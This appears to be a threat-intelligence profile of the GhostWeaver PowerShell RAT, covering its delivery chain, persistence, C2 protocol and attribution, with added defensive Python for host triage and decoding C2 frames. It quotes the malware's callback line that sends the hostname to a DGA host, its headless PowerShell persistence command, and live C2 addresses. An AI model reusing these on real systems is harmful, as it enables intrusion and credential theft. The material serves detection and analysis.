GhostWeaver
GhostWeaver is a fileless, in-memory PowerShell remote access trojan/backdoor. Reporting describes it as a PowerShell RAT that maintains command-and-control over TLS 1.0 on TCP port 25658 using GZip-compressed JSON with a custom protocol, and that it generates server addresses through four separate domain generation algorithm routines. It also hardcodes public DNS resolvers to bypass local or enterprise DNS controls. The malware is designed to maintain persistent communication with its C2 infrastructure and can deliver additional payloads as plugins. Reported plugin capabilities include credential theft from browsers and Outlook, cryptocurrency wallet theft, web-form grabbing/web injection via a MITM proxy, browser data theft, and HTML manipulation. GhostWeaver can also redeploy MintsLoader, indicating a reinfection loop between loader and RAT.
GhostWeaver is described as adapting its installation and persistence to the antivirus product present on the victim machine, with four persistence modes observed. Its persistence framework reportedly uses a CMSTPLUA COM UAC bypass, masquerades process metadata as Windows Explorer, creates a scheduled task that runs every three minutes, and disables the Task Scheduler operational event log. Observed persistence artifacts include use of conhost --headless PowerShell, payload storage under %LOCALAPPDATA%\Microsoft\{random_subfolder}\{funcName}.log, and a registry marker at HKCU:\Software\Microsoft\ExpirienceHost. AV detections commonly label GhostWeaver as Pantera.
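The persistence artifacts listed above (headless conhost launching PowerShell, the three-minute scheduled task, the ExpirienceHost registry marker, and the .log payload under %LOCALAPPDATA%\Microsoft) can be turned into a simple host triage. This is an added example, not code from the page or from any vendor; the event records and their field names are constructed in a vendor-neutral shape rather than taken from a specific EDR schema.

```python
"""Host-artifact triage for the GhostWeaver persistence chain. Added example,
not the page's or any vendor's code; events below are constructed telemetry."""
import re
from collections import defaultdict

HEADLESS_PS = re.compile(r"\bconhost(?:\.exe)?\s+--headless\s+powershell\b.*?-ep\s+bypass", re.I)
MARKER_KEY = r"hkcu\software\microsoft\expiriencehost"   # spelling as reported
PAYLOAD_LOG = re.compile(r"\\appdata\\local\\microsoft\\[^\\]+\\[^\\]+\.log$", re.I)
TASK_INTERVAL_MIN = 3   # reported beacon/task cadence


def normalize_key(key):
    """Accept HKCU:\..., HKCU\... and HKEY_CURRENT_USER\... spellings."""
    return re.sub(r"^(?:hkey_current_user|hkcu):?", "hkcu", key.lower()).rstrip("\\")


def check_event(ev):
    """Return the names of the rules one event satisfies."""
    hits, kind = [], ev["type"]
    if kind == "process" and HEADLESS_PS.search(ev.get("cmdline", "")):
        hits.append("headless_conhost_powershell")
    if kind == "registry" and normalize_key(ev.get("key", "")) == MARKER_KEY:
        hits.append("expiriencehost_marker")
    if kind == "task" and ev.get("interval_min") == TASK_INTERVAL_MIN \
            and HEADLESS_PS.search(ev.get("action", "")):
        hits.append("three_minute_headless_task")
    if kind == "file" and PAYLOAD_LOG.search(ev.get("path", "")):
        hits.append("localappdata_log_payload")   # weak alone; corroboration only
    return hits


def triage(events, min_rules=2):
    """Aggregate hits per host; flag hosts where >= min_rules distinct rules fire,
    so a lone .log file or a lone console launch is not enough on its own."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]].update(check_event(ev))
    return {h: sorted(r) for h, r in per_host.items() if len(r) >= min_rules}


EVENTS = [  # constructed telemetry, not real logs
    {"host": "WS01", "type": "process",
     "cmdline": r"conhost --headless powershell -ep bypass AzureDemo"},
    {"host": "WS01", "type": "registry", "key": r"HKCU:\Software\Microsoft\ExpirienceHost"},
    {"host": "WS01", "type": "task", "interval_min": 3,
     "action": r"conhost --headless powershell -ep bypass AzureDemo"},
    {"host": "WS01", "type": "file", "path": r"C:\Users\a\AppData\Local\Microsoft\k9x2\AzureDemo.log"},
    {"host": "WS02", "type": "process", "cmdline": r"\??\C:\Windows\system32\conhost.exe 0x4"},
    {"host": "WS02", "type": "file", "path": r"C:\Users\b\AppData\Local\Microsoft\Office\setup.log"},
]
```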
Delivery described in the available reporting is primarily through multi-stage malware chains associated with SocGholish/FakeUpdates and MintsLoader. Orange Cyberdefense reported SocGholish infections delivering loaders such as GhoLoader and MintsLoader, which then led to GhostWeaver alongside other payloads. MintsLoader is described as using obfuscated JavaScript and PowerShell, AMSI bypass, sandbox/VM evasion, and DGA-based infrastructure to selectively deliver GhostWeaver to real victim machines while serving decoys such as AsyncRAT to sandbox-like environments. SocGholish itself is delivered via compromised CMS-driven websites using fake browser update lures. The reporting also states that GhostWeaver has been delivered as a PowerShell-based RAT via these fake update chains.
In the reporting, the malware is associated with TA582, which Mandiant tracks as UNC4108, and is described as operating downstream of the SocGholish fake browser update ecosystem. Recorded Future identified GhostWeaver as the primary payload of TA582 within the TAG-124/LandUpdate808 and MintsLoader traffic distribution ecosystem. The broader delivery chain is also linked to TA569/SocGholish as an initial access mechanism. Targeting mentioned in the reporting comes from the surrounding MintsLoader and SocGholish campaigns, including industrial, legal, and energy sectors in the United States and Europe, as well as broad opportunistic targeting through compromised websites.
High-confidence indicators and technical characteristics directly mentioned in the reporting include TCP port 25658 for C2, TLS 1.0, a GZip-compressed JSON protocol, four DGAs, the mutex value euzizvuze, a self-signed TLS certificate with subject CN=GeoTrust LTD., and active C2 nodes observed at 178.156.128.182 and 86.107.101.93. The reporting also notes that GhostWeaver has been observed beaconing every three minutes for extended periods and that one reported capability is stealing credentials and cryptocurrency wallet information from web forms.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
GhostWeaver is a fileless PowerShell RAT that maintains command-and-control (C2) over GZip-compressed JSON inside TLS 1.0 connections on port 25658. AV vendors detect it as Pantera.
GhostWeaver is a fileless PowerShell RAT (remote access trojan) that adapts its installation to whichever antivirus is running on the machine... It communicates over TLS on port 25658... It generates its own server addresses through four separate DGA routines...
Techniques & procedures
27 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
1 technique
Execution
3 techniques
Step 6 - Persistence: GhostWeaver Installation T1053.005, T1112, T1548.002, T1055, T1620 | GhostWeaver Scheduled task: conhost --headless powershell -ep bypass Azure{FunctionName} every 3 minutes.
Persistence
2 techniques
Privilege Escalation
3 techniques
Stealth
7 techniques
"The PS1 source is a single line of 280-630 KB using arithmetic char encoding"; "Arithmetic-obfuscated payload"
"swapping process metadata to pose as Windows Explorer so the COM security check passes."
"We deobfuscated the PowerShell source (855 strings across three obfuscation layers)"; "decoded the C2 wire protocol"
"Before the RAT arrives, a profiler called MintsLoader runs three checks... virtual machine, the GPU type, and the number of CPU cache levels... withheld the payload."
Defense Impairment
1 technique
Credential Access
3 techniques
Discovery
6 techniques
"User $env:COMPUTERNAME"; "Callback: POST http://{DGA4}/htr.php?id={hostname}"
"OS Windows version string"; "Performance Win32_ComputerSystem.Domain"; "GPU check (Win32_VideoController)"; "CPU cache check (Win32_CacheMemory)"
Collection
1 technique
Command and Control
6 techniques
"The wire format is a 4-byte little-endian length header followed by GZip-compressed JSON"
"GhostWeaver skips HTTP entirely. It communicates over raw TCP on port 25658, wrapped in TLS 1.0"
Orange Cyberdefense said it has observed SocGholish infections delivering loaders like Gholoader and MintsLoader, which, in turn, lead to the deployment of additional payloads like GhostWeaver, LockBit, AsyncRAT, and NetSupport RAT.
Step 4 - C2 Resolution: Domain Generation Algorithm T1568.002 | MintsLoader, GhostWeaver Four distinct DGA algorithms across kill chain stages.
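The wire format quoted above (a 4-byte little-endian length header followed by GZip-compressed JSON, carried over raw TCP inside TLS 1.0 on port 25658) is simple enough to decode from a captured session once the TLS layer has been removed, for instance from a sandbox run with a TLS key log. This is an added example, not code from the page or from any vendor report; it assumes the TLS layer is already stripped, and the JSON field names in the sample frames are constructed placeholders since the page does not document the message schema.

```python
"""Decoder for the GhostWeaver C2 frame format: 4-byte little-endian length,
then GZip-compressed JSON. Added example, not the page's or any vendor's code;
assumes TLS is already stripped and uses constructed JSON field names."""
import gzip
import json
import struct
import zlib

HEADER_LEN = 4                 # little-endian body length
MAX_FRAME = 16 * 1024 * 1024   # sanity bound against absurd length fields


def encode_frame(obj):
    """Build one frame; used here only to construct sample traffic."""
    body = gzip.compress(json.dumps(obj).encode("utf-8"))
    return struct.pack("<I", len(body)) + body


def decode_stream(buf):
    """Return (frames, leftover, errors): decoded JSON objects, the unconsumed
    tail (a truncated final frame), and descriptions of frames that failed."""
    frames, errors, pos = [], [], 0
    while pos + HEADER_LEN <= len(buf):
        (length,) = struct.unpack_from("<I", buf, pos)
        if length > MAX_FRAME:
            errors.append(f"offset {pos}: implausible length {length}")
            break  # framing is lost; stop rather than resync blindly
        end = pos + HEADER_LEN + length
        if end > len(buf):
            break  # incomplete frame: leave it for the next read
        try:
            frames.append(json.loads(gzip.decompress(buf[pos + HEADER_LEN:end])))
        except (OSError, EOFError, zlib.error, ValueError) as exc:
            errors.append(f"offset {pos}: undecodable frame ({exc})")
        pos = end  # a bad frame is skipped so later frames are still recovered
    return frames, buf[pos:], errors


def demo():
    """Two constructed frames followed by a truncated third one."""
    beacon = {"id": "WIN-CONSTRUCTED", "type": "beacon"}  # constructed fields
    reply = {"type": "plugin", "name": "demo-plugin"}      # constructed fields
    stream = encode_frame(beacon) + encode_frame(reply) + encode_frame({"type": "x"})[:5]
    return decode_stream(stream)
```

Running the decoder over a TLS-stripped session lets an analyst confirm the protocol match and recover the JSON tasking without relying on the port number alone.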
IOCs tracked for this family
31 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
13 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
An additional payload observed downstream of SocGholish-delivered loaders.
A PowerShell backdoor delivered downstream from SocGholish-associated loaders.
A PowerShell backdoor observed as a downstream payload in SocGholish infection chains.
A PowerShell backdoor that steals credentials and cryptocurrency wallet information from web forms.